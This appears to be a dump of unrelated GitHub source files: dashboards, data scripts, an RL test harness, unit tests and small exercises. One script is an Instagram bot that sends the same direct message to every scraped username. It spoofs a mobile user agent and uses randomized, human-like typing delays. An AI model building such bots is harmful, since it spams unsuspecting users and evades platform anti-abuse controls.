DataFrame chamado df_aux, que contém as colunas 'City', 'Road_traffic_density', 'Delivery_location_latitude' e 'Delivery_location_longitude' do objeto df1.\n Os dados de df_aux são agrupados por 'City' e 'Road_traffic_density', e calcula-se a mediana das outras colunas.\n Cria um objeto Map do Folium.\n Itera sobre cada linha do objeto df_aux, criando um marcador no mapa Folium para cada ponto de entrega.\n O popup do marcador contém as informações de 'City' e 'Road_traffic_density' para cada ponto de entrega.\n Exibe o mapa usando folium_static.\n Retorna None.\n\n \"\"\"\n \n df_aux = ( df1.loc[:, ['City', 'Road_traffic_density', 'Delivery_location_latitude', 'Delivery_location_longitude']]\n .groupby( ['City', 'Road_traffic_density'] )\n .median()\n .reset_index() )\n\n\n map = folium.Map()\n\n for index, location_info in df_aux.iterrows():\n folium.Marker( [location_info['Delivery_location_latitude'],\n location_info['Delivery_location_longitude']],\n popup=location_info[['City', 'Road_traffic_density']] ).add_to( map)\n\n folium_static(map, width=1024 , height=600 ) \n return None \n#--------------------------------------------------------------#\n# Função order_share_by_week\n\ndef order_share_by_week( df1 ) : \n# Quantidade de pedidos / numero unico de entregadores \n df_aux01 = df1.loc[:, ['ID', 'week_of_year']].groupby( 'week_of_year' ).count().reset_index()\n df_aux02 = df1.loc[:, ['Delivery_person_ID', 'week_of_year']].groupby( 'week_of_year' ).nunique().reset_index()\n df_aux = pd.merge( df_aux01, df_aux02, how='inner', on='week_of_year')\n df_aux['order_by_deliver'] = df_aux['ID'] / df_aux['Delivery_person_ID'] \n fig = px.line(df_aux, x='week_of_year', y='order_by_deliver')\n\n return fig \n \"\"\"\n A função order_share_by_week(df1) recebe um objeto DataFrame chamado df1 como parâmetro. O código da função faz o seguinte:\n\n Cria um objeto df_aux01, que contém as colunas 'ID' e 'week_of_year' do objeto df1. Os dados de df_aux01 são agrupados por 'week_of_year',\n contando o número de pedidos feitos em cada semana.\n Cria um objeto df_aux02, que contém as colunas 'Delivery_person_ID' e 'week_of_year' do objeto df1.\n Os dados de df_aux02 são agrupados por 'week_of_year', contando o número de entregadores únicos em cada semana.\n Cria um objeto df_aux que combina as informações de df_aux01 e df_aux02, fazendo um merge interno dos dados em relação à coluna 'week_of_year'.\n Cria uma nova coluna em df_aux chamada 'order_by_deliver', que divide a quantidade de pedidos pelo número de entregadores únicos em cada semana.\n Cria um objeto fig usando a biblioteca Plotly Express.\n O gráfico de linha plotado mostra a evolução da relação entre a quantidade de pedidos e o número de entregadores em cada semana.\n Ao final, a função retorna o objeto fig.\n \n \"\"\"\n \n#---------------------------------------------------------------------------------------------------------------#\n\n# Função order_by_week\ndef order_by_week( df1 ):\n # criando coluna de semana \n df1['week_of_year'] = df1['Order_Date'].dt.strftime( '%U' )\n teste = df1.loc[:, ['ID', 'week_of_year']].groupby( 'week_of_year' ).count().reset_index()\n fig = px.line( teste, x='week_of_year', y='ID' )\n return fig\n\n \"\"\"\n A função order_by_week(df1) recebe um objeto DataFrame chamado df1 como parâmetro. O código da função faz o seguinte:\n\n Cria uma nova coluna em df1 chamada 'week_of_year', que contém o número da semana do ano correspondente à data do pedido.\n Cria um objeto teste, que contém as colunas 'ID' e 'week_of_year' do objeto df1.\n Os dados de teste são agrupados por 'week_of_year', contando o número de pedidos feitos em cada semana.\n Cria um objeto fig usando a biblioteca Plotly Express.\n O gráfico de linha plotado mostra a evolução da quantidade de pedidos em cada semana.\n Ao final, a função retorna o objeto fig.\n \"\"\"\n\n#----------------------------------------------------------------------------------------------------------------#\n\n# Função traffic_order_city\ndef traffic_order_city( df1 ):\n \n test = ( df1.loc[:, ['ID', 'City', 'Road_traffic_density']]\n .groupby( ['City', 'Road_traffic_density'] )\n .count()\n .reset_index() )\n fig = px.scatter( test, x='City', y='Road_traffic_density', size='ID', color='City')\n\n return fig\n\n\n \"\"\"\n A função traffic_order_city(df1) recebe um objeto DataFrame chamado df1 como parâmetro. O código da função faz o seguinte:\n\n Cria um objeto test que contém as colunas 'ID', 'City' e 'Road_traffic_density' do objeto df1.\n Os dados de test são agrupados por 'City' e 'Road_traffic_density', contando o número de pedidos feitos em cada combinação de cidade e densidade de tráfego.\n Cria um objeto fig usando a biblioteca Plotly Express.\n O gráfico de dispersão plotado mostra as combinações de cidades e densidades de tráfego,\n com o tamanho de cada ponto representando o número de pedidos em cada combinação e a cor representando a cidade.\n Ao final, a função retorna o objeto fig.\n \"\"\"\n#----------------------------------------------------------------------------------------------------------------#\n\n# Função traffic_order_share\ndef traffic_order_share( df1 ):\n \n df_aux = df1.loc[:, ['ID', 'Road_traffic_density']].groupby( 'Road_traffic_density' ).count().reset_index() \n\n df_aux['entregas_perc'] = df_aux['ID'] / df_aux['ID'].sum()\n\n px.pie( df_aux, values='entregas_perc', names='Road_traffic_density' )\n\n fig = px.pie( df_aux, values='entregas_perc', names='Road_traffic_density' )\n\n return fig\n\n\n\n \"\"\"\n A função traffic_order_share(df1) recebe um objeto DataFrame chamado df1 como parâmetro. O código da função faz o seguinte:\n\n Cria um objeto df_aux que contém as colunas 'ID' e 'Road_traffic_density' do objeto df1. Os dados de df_aux são agrupados por 'Road_traffic_density',\n contando o número de pedidos feitos em cada densidade de tráfego.\n Calcula a porcentagem de entregas em cada densidade de tráfego e adiciona essa informação como uma nova coluna chamada 'entregas_perc' no objeto df_aux.\n Cria um gráfico de pizza (pie chart) usando a biblioteca Plotly Express.\n O gráfico mostra a proporção de entregas em cada densidade de tráfego.\n Ao final, a função retorna o objeto fig.\n \"\"\"\n#----------------------------------------------------------------------------------------------------------------#\n\n# Função order_metric\ndef order_metric( df1 ):\n \n coluna = ['ID', 'Order_Date']\n\n #seleção de linhas \n df_aux = df1.loc[:, coluna].groupby( ['Order_Date'] ).count().reset_index()\n\n # Desenhar Grafico \n fig = px.bar( df_aux, x='Order_Date', y='ID')\n\n return fig\n\n \"\"\"\n A função recebe um objeto DataFrame chamado df1 como parâmetro. O código da função faz o seguinte:\n\n Cria uma lista chamada coluna com as colunas 'ID' e 'Order_Date'.\n Cria um objeto df_aux que contém as colunas especificadas em coluna do objeto df1.\n Os dados de df_aux são agrupados por 'Order_Date', contando o número de pedidos feitos em cada data.\n Cria um gráfico de barras (bar chart) usando a biblioteca Plotly Express.\n O gráfico mostra a quantidade de pedidos feitos em cada data.\n Ao final, a função retorna o objeto fig.\n \"\"\"\n \n#----------------------------------------------------------------------------------------------------------------#\n\n# Função clean_code\ndef clean_code( df1 ):\n \"\"\" Esta função tem a responsabilidade de limpar o dataframe\n \n Tipos de limpeza:\n 1. Remoção dos dados NaN\n 2. Mudança do tipo da coluna \n 3. Remoção dos espaços das variáveis de texto\n 4. Formatação da coluna de datas \n 5. Limpeza da coluna de tempo ( remoção do texto da variável númerica )\n \n Input: Dataframe\n Output: Dataframe\n \n \n \"\"\"\n \n ## Limpeza dos dados \n # 1. convertendo a coluna Age do texto para numero \n linha_selecionada = (df1['Delivery_person_Age' ] != 'NaN ')\n df1 = df1.loc[linha_selecionada, :].copy()\n\n linha_selecionada = (df1['Road_traffic_density' ] != 'NaN ')\n df1 = df1.loc[linha_selecionada, :].copy()\n\n linha_selecionada = (df1['City' ] != 'NaN ')\n df1 = df1.loc[linha_selecionada, :].copy()\n\n linha_selecionada = (df1['Festival' ] != 'NaN ')\n df1 = df1.loc[linha_selecionada, :].copy()\n\n df1[ 'Delivery_person_Age'] = df1[ 'Delivery_person_Age' ].astype( int )\n\n # 2. convertendo a coluna Ratings de texto para numero decimal ( float )\n df1['Delivery_person_Ratings'] = df1['Delivery_person_Ratings'].astype( float )\n\n # 3. convertendo a coluna order_date de texto para data\n df1['Order_Date'] = pd.to_datetime( df1['Order_Date' ], format='%d-%m-%Y' )\n\n # 4. convertendo multiple_deliveries de texto para numero inteiro ( int )\n linha_selecionada = (df1['multiple_deliveries'] != 'NaN ')\n df1 = df1.loc[linha_selecionada, :].copy()\n df1['multiple_deliveries'] = df1['multiple_deliveries'].astype( int )\n\n # 5. Removendo os espaços dentro de strings/testos/object\n df1.loc[:, 'ID'] = df1.loc[:, 'ID'].str.strip()\n df1.loc[:, 'Road_traffic_density'] = df1.loc[:, 'Road_traffic_density'].str.strip()\n df1.loc[:, 'Type_of_order'] = df1.loc[:, 'Type_of_order'].str.strip()\n df1.loc[:, 'Type_of_vehicle'] = df1.loc[:, 'Type_of_vehicle'].str.strip()\n df1.loc[:, 'City'] = df1.loc[:, 'City'].str.strip()\n df1.loc[:, 'Festival'] = df1.loc[:, 'Festival'].str.strip()\n\n # 6. Limpando a coluna de Time taken(min)\n df1['Time_taken(min)'] = df1['Time_taken(min)'].apply( lambda x: x.split( '(min)')[1] )\n df1['Time_taken(min)'] = df1['Time_taken(min)'].astype( int )\n\n return df1\n\n\n#-------------------------- Inicio da Estrutura lógica do código------------------------\n#---------------------------------------------------------------------------------------\n# importando dataset\ndf = pd.read_csv( 'dataset/train.csv' )\n\ndf1 = clean_code( df )\n\n\n \n# Visão - Empresa \n# ==========================================================================\n# Barra Lateral \n# ==========================================================================\nst.header( 'Marketplace - Visão Cliente' )\n\n#image_path = '/Users/eliom/Documents/repos/ftc_ds/cury.jpg'\nimage = Image.open( 'cury.jpg' )\nst.sidebar.image( image, width=120 )\n\nst.sidebar.markdown( '# Cury Company' )\nst.sidebar.markdown( '## Fastest Delivery in Town' )\nst.sidebar.markdown( \"\"\"___\"\"\" )\n\nst.sidebar.markdown( '## Selecione uma data limite ' )\n\nimport datetime\n\ndate_value = pd.Timestamp(2022, 4, 13)\ndate_timestamp = int(date_value.timestamp())\n\ndate_datetime = datetime.datetime.fromtimestamp(date_timestamp)\n\ndate_slider = st.sidebar.slider(\n \"Até qual valor?\",\n value=date_datetime,\n min_value=datetime.datetime(2022, 2, 11),\n max_value=datetime.datetime(2022, 4, 6),\n format='YYYY-MM-DD'\n)\n\nst.sidebar.markdown( \"\"\"___\"\"\" )\n\n\ntraffic_options = st.sidebar.multiselect(\n 'Quais as condições do trânsito',\n ['Low', 'Medium', 'High', 'Jam'],\n default=['Low', 'Medium', 'High', 'Jam'] )\n\nst.sidebar.markdown( \"\"\"___\"\"\" )\nst.sidebar.markdown( '### Powered by Comunidade DS' )\n\n# Filtro de Data \nlinhas_selecionadas = df1['Order_Date'] < date_slider\ndf1 = df1.loc[linhas_selecionadas, :]\n\n# Filtro de Transito \nlinhas_selecionadas = df1['Road_traffic_density'].isin( traffic_options )\ndf1 = df1.loc[linhas_selecionadas, :]\n# ==========================================================================\n# Layout no Streamlit\n# ==========================================================================\ntab1, tab2, tab3 = st.tabs( ['Visão Gerencial', 'Visão Tática', 'Visão Geográfica'] )\n\nwith tab1:\n with st.container():\n # Order Matric\n fig = order_metric( df1 )\n st.markdown( '# Orders By Day' )\n st.plotly_chart(fig, use_container_width=True )\n \n \n \n with st.container():\n col1, col2 = st.columns( 2 )\n \n with col1:\n fig = traffic_order_share( df1 )\n st.header( \"Traffic Order Share\" )\n st.plotly_chart(fig, use_container_width=True )\n \n \n with col2:\n st.header( \"Traffic Order City\" )\n fig = traffic_order_city( df1 )\n st.plotly_chart( fig, use_container=True )\n\n \n \nwith tab2:\n with st.container():\n st.markdown(\"# Order By Week\" )\n fig = order_by_week( df1 )\n st.plotly_chart(fig, use_container_width=True )\n \n with st.container():\n st.markdown(\"# Order Share by Week\" )\n fig = order_share_by_week( df1 )\n st.plotly_chart(fig, use_container_width=True )\n \n\nwith tab3:\n st.markdown( \"# Country Maps\" )\n country_maps( df1 )\n \n \n\n","repo_name":"Eliomatheus/curry_company","sub_path":"pages/1_visao_empresa.py","file_name":"1_visao_empresa.py","file_ext":"py","file_size_in_byte":13853,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38891697892","text":"import pytz\nimport geopandas as gpd\nfrom shapely.geometry import Point, Polygon\nimport matplotlib.pyplot as plt\n\nfilename = \"./tz_world/tz_world.shp\"\n\nif __name__ == \"__main__\":\n\n print(\"Read shapefile %s...\" % filename)\n polys = gpd.read_file(filename)\n\n print(\"Print polygons....\")\n print(polys)\n\n print(\"Create point...\")\n p = Point(1.4488911764032935, 43.604560049363485)\n print(p)\n\n print(\"Put point in a geodataframe...\")\n d = {'col1': ['Toulouse'], 'geometry': [p]}\n gdf = gpd.GeoDataFrame(d, crs=\"EPSG:4326\")\n\n print(\"Display shapefile and point...\")\n fig, ax = plt.subplots()\n polys.plot(ax=ax, facecolor='gray');\n gdf.plot(ax=ax, facecolor='red');\n plt.show()\n","repo_name":"remidebord/Local-Time-Grid-Generator","sub_path":"plot-shapefile-with-point.py","file_name":"plot-shapefile-with-point.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3488164045","text":"import os\nimport random\nimport json\nimport logging\n\nimport numpy as np\n\nimport torch\nfrom sklearn.metrics import f1_score\n\n# custom imports\n\nfrom models.dqn import DQNModel\nfrom utils.misc import parse_arguments, set_logger\nfrom utils.io import load_dqn_model\n\nimport utils.constants as cts\nfrom dataset.custom_feat_extractor import CustomFeatExtractor\nfrom dataset.custom_dataset import TestDataset\n\nnp.random.seed(42)\nrandom.seed(42)\ntorch.set_printoptions(precision=4, sci_mode=False)\n\n\nclass TestAgent():\n\n def __init__(self, args):\n\n self.args = args\n\n self.test_dataset = TestDataset(args)\n self.configs = self.test_dataset.configs\n self.n_configs = len(self.configs)\n\n self.model = DQNModel(\n n_actions=self.n_configs, dataset=args.dataset).to(cts.DEVICE)\n\n self.feat_extractor = CustomFeatExtractor(args, self.configs)\n\n model_path = os.path.join(\n cts.DATA_DIR,\n cts.RL_MODEL_ROOT,\n args.class_name)\n if not os.path.exists(model_path):\n logging.info(\"Model folder %s does not exist\")\n exit(0)\n\n self.model = load_dqn_model(\n self.model, model_path, cts.DEVICE)\n\n self.model.eval()\n\n def test_agent_with_raw_images(self):\n\n self.model.eval()\n test_time = 0\n preds = []\n gts = []\n configs = []\n init_config = len(self.test_dataset.configs)-1\n\n self.test_dataset.reset()\n\n state, gt = self.test_dataset.get_state(init_config)\n obs, pred, udf_time = self.feat_extractor.get_observation_from_state(\n state)\n test_time += udf_time\n preds.append(pred)\n gts.append(gt)\n configs.append(init_config)\n while obs is not None:\n obs = obs.to(cts.DEVICE)\n q_value = self.model(obs)\n if cts.USE_CUDA:\n torch.cuda.synchronize()\n config = q_value.argmax(\n 1).data.cpu().numpy().astype(int)[0]\n\n state, gt = self.test_dataset.get_state(config)\n if state is None:\n obs = None\n continue\n obs, pred, udf_time = \\\n self.feat_extractor.get_observation_from_state(state)\n\n test_time += udf_time\n preds.append(pred)\n gts.append(gt)\n configs.append(config)\n\n test_f1 = f1_score(gts, preds)\n logging.info(\"Total execution time: %.2f\", test_time)\n logging.info(\"Total frames: %d\", self.test_dataset.total_frames)\n logging.info(\"Test F1 score: %.2f\", test_f1*100)\n logging.info(\"FPS: %.2f\", self.test_dataset.total_frames/test_time)\n logging.info(\"Config dist: %s\", np.unique(configs, return_counts=True))\n\n\nif __name__ == \"__main__\":\n\n args = parse_arguments()\n\n args.result_path = os.path.join(\n cts.DATA_DIR,\n 'results',\n args.class_name)\n if not os.path.exists(args.result_path):\n os.makedirs(args.result_path)\n log_file = os.path.join(args.result_path,\n 'test_results.log')\n set_logger(log_file=log_file)\n\n logging.info(\"Start execution\")\n logging.info(\"main:: Start execution with args:\\n %s\",\n json.dumps(vars(args), indent=4))\n\n agent = TestAgent(args)\n\n agent.test_agent_with_raw_images()\n","repo_name":"georgia-tech-db/zeus","sub_path":"src/rl-inference-engine/rl-agent.py","file_name":"rl-agent.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"4601603462","text":"from typing import Any\nfrom gspread.models import Spreadsheet\nfrom cli import parse_commandline_args\nfrom config import Configuration\nfrom datetime import datetime\nimport gspread\nimport csv\nfrom google.oauth2.service_account import Credentials\nfrom stopwatch import Stopwatch\n\n# e.g. python main.py --importfile ./data/example.csv --credentials ./.local/secret.json --share example@gmail.com --title Sample\ndef main():\n \"\"\" Main Process\n\n Args:\n none\n Returns:\n code (int): exit status code.\n \"\"\"\n stopwatch = Stopwatch()\n stopwatch.start()\n\n args = parse_commandline_args()\n\n # create sheet title\n titlePrefix = args.title\n if not (args.title):\n titlePrefix = \"NewReport\"\n now = datetime.now()\n title = titlePrefix + '_' + str(now.year) + str(now.month).zfill(2) + str(now.day).zfill(2) + str(now.hour).zfill(2) + str(now.minute).zfill(2) + str(now.second).zfill(2)\n\n # load configuraion\n config = Configuration()\n\n # create sheet\n scopes = [\n 'https://www.googleapis.com/auth/spreadsheets',\n 'https://www.googleapis.com/auth/drive'\n ]\n\n try:\n credentials = Credentials.from_service_account_file(args.credentials, scopes=scopes)\n gc = gspread.authorize(credentials)\n sheet = gc.create(title)\n \n # share user\n sheet.share(args.share, perm_type='user', role='owner')\n\n # update worksheet\n wk = sheet.sheet1\n wk.update_title('Result')\n\n # input worksheet\n with open(file=args.importfile, mode=\"r\", encoding=\"utf-8\") as f:\n reader = csv.DictReader(f, delimiter=\",\", doublequote=False, lineterminator=\"\\r\")\n\n # update worksheet\n wk.add_rows(len(reader.fieldnames) + config.row_buffer)\n wk.add_cols(config.column_buffer)\n \n # set header\n headers = wk.range(1, 1, 1, len(reader.fieldnames))\n for i in range(len(reader.fieldnames)):\n headers[i].value = reader.fieldnames[i]\n wk.update_cells(headers)\n\n # set value\n fileds = reader.fieldnames\n v_row_count = 2\n total_cells = []\n for row in reader:\n cells = wk.range(v_row_count, 1, v_row_count, len(fileds))\n for i in range(len(fileds)):\n cells[i].value = row[fileds[i]]\n total_cells.extend(cells)\n v_row_count += 1\n wk.update_cells(total_cells)\n\n except:\n raise\n\n finally:\n stopwatch.stop()\n info(sheet)\n \n print(f'Complete🎉 : time = {stopwatch.duration}')\n return 0\n\ndef info(sheet: Spreadsheet):\n \"\"\" Show information.\n\n Args:\n sheet (Spreadsheet)\n Returns:\n void\n \"\"\"\n\n print()\n print('##### SpredSheet Info #####')\n print(f'* ID : {sheet.id}')\n print(f'* URL : {sheet.url}')\n print()\n\nif __name__ == \"__main__\":\n main()","repo_name":"atEaE-tried/python-to-spread","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21695082120","text":"import pandas as pd\n\ndef eliminar_columnas(csv_entrada, columnas_eliminar, csv_salida):\n # Cargar el archivo CSV de entrada en un DataFrame\n df = pd.read_csv(csv_entrada)\n\n # Eliminar las columnas no utilizadas\n df = df.drop(columnas_eliminar, axis=1)\n\n # Guardar el DataFrame resultante en un nuevo archivo CSV\n df.to_csv(csv_salida, index=False)\n\n# Ejemplo de uso\ncsv_entrada = 'diputados_modificado.csv'\ncsv_salida = 'votos.csv'\ncolumnas_eliminar = ['NUM_BOLETAS_EXTRAIDAS','CAND_IND_2','DISTRITO', 'SECCION','ID_CASILLA','TIPO_CASILLA','EXT_CONTIGUA','UBICACION_CASILLA','TIPO_ACTA','NUM_BOLETAS_SOBRANTES','TOTAL_CIUDADANOS_VOTARON','C_PRI_PVEM','C_PRD_PT','CAND_IND_1','NO_REGISTRADOS','TOTAL_VOTOS','LISTA_NOMINAL','OBSERVACIONES','CONTABILIZADA'] # Lista de columnas a eliminar\n\neliminar_columnas(csv_entrada, columnas_eliminar, csv_salida)\n","repo_name":"PVega17102/AI_Elections","sub_path":"clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10606815950","text":"fruits=['apple','banana','grape']\nfruits.append('orange')\nfruits.insert(1,'pear')\ndel fruits[fruits.index('grape')]\nprint(fruits)\nlst1=[0.5,1.6,8.5,6.4,7.2,5,3.6,5.5,4.1,10]\ndel lst1[lst1.index(max(lst1))]\ndel lst1[lst1.index(min(lst1))]\nprint(sum(lst1)/len(lst1))\nfrom math import pi\nprint(\"{hehe} is {hehe}\".format(hehe='nmsl'))\nprint(\"{0:.2f}\".format(pi))","repo_name":"HCHogan/Rough-Period","sub_path":"例题/PY/垃圾堆/temp01.py","file_name":"temp01.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"25719082710","text":"# -*- coding: utf-8 -*-\n\nimport json\nimport sfml as sf\n\nclass Application :\n _instance = None\n\n @classmethod\n def instance(klass) :\n if klass._instance == None :\n klass._instance = Application()\n return klass._instance\n\n def __init__(self):\n self.state = None\n self.window = None\n\n f = open(\"config.json\")\n self.config = json.load(f)\n f.close()\n\n def pre_load(self) :\n self.window = sf.RenderWindow(sf.VideoMode(800, 600), \"Input Test\")\n \n self.window.framerate_limit = 60\n self.window.key_repeat_enabled = False\n\n self.window.clear(sf.Color(0, 0, 0))\n self.window.display()\n\n def input(self, frame) :\n for event in self.window.events :\n if type(event) == sf.CloseEvent :\n self.window.close()\n break\n\n elif type(event) == sf.KeyEvent :\n self.state.input(frame, event)\n\n def update(self, frame) :\n self.state.update(frame)\n\n def draw(self, frame) :\n self.window.clear(sf.Color(0, 0, 0))\n self.state.draw(frame, self.window)\n self.window.display()\n\n def run(self) :\n self.pre_load()\n\n self.state = FightState()\n\n clock = sf.Clock();\n offset = clock.elapsed_time.seconds - int(clock.elapsed_time.seconds)\n\n last_frame = -1\n\n while self.window.is_open :\n frame = int((clock.elapsed_time.seconds - offset) / (1.0 / 60.0))\n\n self.input(frame)\n\n if frame != last_frame :\n self.update(frame)\n self.draw(frame)\n \n last_frame = frame\n \n f = open(\"log\", \"w+\")\n json.dump(self.state.p1.controller.buffer, f, indent=True)\n f.close()\n\nfrom FightState import *\n","repo_name":"Rafagd/luta","sub_path":"Application.py","file_name":"Application.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22977916038","text":"'''mutable.py\nThe difference between mutable and immutable types\n'''\n\n# A list is a mutable type\na = [1,2,3,4]\n\n# I can use the variable assignment notation to change the value of one element in the list\na[0] = 100\n\n# We can also use insert() method to change the value of list `a`\na.insert(3, 200)\n\na.sort()\n\n# String is an immutable type\ns = 'hello world'\n# s[0] = 'm'\ns = s.replace('world', 'Mars')\nprint(s)\n\n'''\nReview:\n\nMutable types: list, dictionary, set, user defined objects\nImmutable types: integer, float, long, complex, string, tuple\n'''\n\n","repo_name":"sdotpeng/Python_Jan_Plan","sub_path":"Feb_7/mutable.py","file_name":"mutable.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28252667280","text":"import npyscreen\n\nfrom utils.Forms import (\n Search, \n displayfeed,\n displaydetailed,\n downloading,\n playing \n)\n\nclass App(npyscreen.NPSAppManaged):\n def onStart(self):\n self.addForm('MAIN', Search, name='Search')\n self.addForm('display',displayfeed, name= \"SEARCH RESULTS\")\n self.addForm('detailed',displaydetailed, name = \" \")\n self.addForm('downloading',downloading,name = \" DOWNLOAD STATUS\")\n self.addForm('playing',playing, name = \" Playing video\")\n\n \n\n\nif __name__ == '__main__':\n Apprun = App().run() \n","repo_name":"victorphoenix3/youtube-downloader","sub_path":"App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"12983328728","text":"from selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom webdriver_manager.chrome import ChromeDriverManager as Cm\nfrom selenium import webdriver\nfrom configparser import ConfigParser\nimport sqlite3\nimport time\nimport random\nfrom run import scrape\n\nTIMEOUT = 60\n\nprint(\"\"\"\n \n __ .__ __. _______.___________. ___ _______ .______ ___ .___ ___. \n| | | \\ | | / | | / \\ / _____|| _ \\ / \\ | \\/ | \n| | | \\| | | (----`---| |----` / ^ \\ | | __ | |_) | / ^ \\ | \\ / | \n| | | . ` | \\ \\ | | / /_\\ \\ | | |_ | | / / /_\\ \\ | |\\/| | \n| | | |\\ | .----) | | | / _____ \\ | |__| | | |\\ \\----./ _____ \\ | | | | \n|__| |__| \\__| |_______/ |__| /__/ \\__\\ \\______| | _| `._____/__/ \\__\\ |__| |__| \n \n \n\"\"\")\n\n\ndef read_users():\n con = sqlite3.connect('database.db')\n curs = con.execute('SELECT name FROM accounts where sent = 0')\n rows = curs.fetchall()\n users = []\n for row in rows:\n users.append(row[0])\n return users\n\n\nconfig_object = ConfigParser()\n\nconfig_object.read(\"confg.ini\")\n\n# Get the password\n\nuserinfo = config_object[\"USERINFO\"]\nUSERNAME = format(userinfo[\"put your Email or username\"])\nPASSWORD = format(userinfo[\"put your Password here\"])\nmessage = format(userinfo[\"put your Message here\"])\nprint(\"login..........\")\noptions = webdriver.ChromeOptions()\noptions.add_argument('--no-sandbox')\noptions.add_argument(\"--log-level=3\")\nmobile_emulation = {\n \"userAgent\": \"Mozilla/5.0 (Linux; Android 4.2.1; en-us; Nexus 5 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/90.0.1025.166 Mobile Safari/535.19\"}\noptions.add_experimental_option(\"mobileEmulation\", mobile_emulation)\n\nbot = webdriver.Chrome(executable_path=Cm().install(), options=options)\n\n\ndef login():\n bot.get('https://www.instagram.com/accounts/login/')\n\n time.sleep(2)\n\n print(\"[Info] - Logging in...\")\n\n user_element = WebDriverWait(bot, TIMEOUT).until(\n ec.presence_of_element_located((\n By.XPATH, '//*[@id=\"loginForm\"]/div[1]/div[3]/div/label/input')))\n\n user_element.send_keys(USERNAME)\n\n pass_element = WebDriverWait(bot, TIMEOUT).until(\n ec.presence_of_element_located((\n By.XPATH, '//*[@id=\"loginForm\"]/div[1]/div[4]/div/label/input')))\n\n pass_element.send_keys(PASSWORD)\n\n login_button = WebDriverWait(bot, TIMEOUT).until(\n ec.presence_of_element_located((\n By.XPATH, '//*[@id=\"loginForm\"]/div[1]/div[6]/button')))\n\n time.sleep(0.4)\n\n login_button.click()\n\n time.sleep(3)\n for user in read_users():\n try:\n bot.get('https://www.instagram.com/')\n bot.get('https://www.instagram.com/direct/new/')\n time.sleep(random.uniform(2, 4))\n input_field = bot.find_element_by_class_name(\"j_2Hd\")\n for ch in user:\n input_field.send_keys(ch)\n time.sleep(0.2)\n print(\"here1\")\n time.sleep(2)\n buton_valid = WebDriverWait(bot, TIMEOUT).until(\n ec.presence_of_element_located((\n By.CLASS_NAME, '-qQT3')))\n buton_valid.click()\n print(\"here2\")\n time.sleep(2)\n buton_next = WebDriverWait(bot, TIMEOUT).until(\n ec.presence_of_element_located((\n By.CLASS_NAME, 'sqdOP')))\n\n buton_next.click()\n input_field = WebDriverWait(bot, TIMEOUT).until(\n ec.presence_of_element_located((\n By.XPATH, '//*[@id=\"react-root\"]/section/div[2]/div/div/div[2]/div/div/div/textarea')))\n time.sleep(random.uniform(5, 10))\n print(\"[info...] type the input now \")\n for ch in message:\n input_field.send_keys(ch)\n time.sleep(0.2)\n time.sleep(random.uniform(5, 10))\n button_send = WebDriverWait(bot, TIMEOUT).until(\n ec.presence_of_element_located((\n By.XPATH, '//*[@id=\"react-root\"]/section/div[2]/div/div/div[2]/div/div/div[2]/button')))\n button_send.click()\n con = sqlite3.connect('database.db')\n curs = con.execute('SELECT name FROM accounts')\n sql_update_query = f\"\"\"Update accounts set sent = 1 where name = '{user}'\"\"\"\n curs.execute(sql_update_query)\n con.commit()\n print(\"Record Updated successfully \")\n curs.close()\n time.sleep(random.uniform(10, 30))\n except NoSuchElementException:\n print(\"error\")\n pass\n\n\nif __name__ == '__main__':\n scrape()\n login()\n","repo_name":"ismailelghazi/bots-telegram-instagram","sub_path":"instagram.py","file_name":"instagram.py","file_ext":"py","file_size_in_byte":5034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39398714380","text":"import unittest\nfrom unittest import mock\n\nfrom google.cloud.datacatalog import types\n\nfrom datacatalog_tag_exporter import datacatalog_facade\n\n\nclass DataCatalogFacadeTest(unittest.TestCase):\n\n @mock.patch('datacatalog_tag_exporter.datacatalog_facade.datacatalog.DataCatalogClient')\n def setUp(self, mock_datacatalog_client):\n self.__datacatalog_facade = datacatalog_facade.DataCatalogFacade()\n # Shortcut for the object assigned to self.__datacatalog_facade.__datacatalog\n self.__datacatalog_client = mock_datacatalog_client.return_value\n\n def test_constructor_should_set_instance_attributes(self):\n self.assertIsNotNone(self.__datacatalog_facade.__dict__['_DataCatalogFacade__datacatalog'])\n\n def test_get_tag_template_should_call_client_library_method(self):\n self.__datacatalog_facade.get_tag_template(None)\n\n datacatalog = self.__datacatalog_client\n datacatalog.get_tag_template.assert_called_once()\n\n def test_search_tag_templates_should_return_values(self):\n result_iterator = MockedObject()\n\n entry = MockedObject()\n entry.name = 'template_1'\n\n entry_2 = MockedObject()\n entry_2.name = 'template_2'\n\n expected_return_value = [entry, entry_2]\n\n # simulates two pages\n result_iterator.pages = [[entry], [entry_2]]\n\n datacatalog = self.__datacatalog_client\n datacatalog.search_catalog.return_value = result_iterator\n\n return_value = self.__datacatalog_facade.search_tag_templates('my-project1,my-project2')\n\n self.assertEqual(1, datacatalog.search_catalog.call_count)\n self.assertEqual(expected_return_value, return_value)\n\n def test_search_tagged_assets_should_return_values(self):\n result_iterator = MockedObject()\n\n entry = MockedObject()\n entry.name = 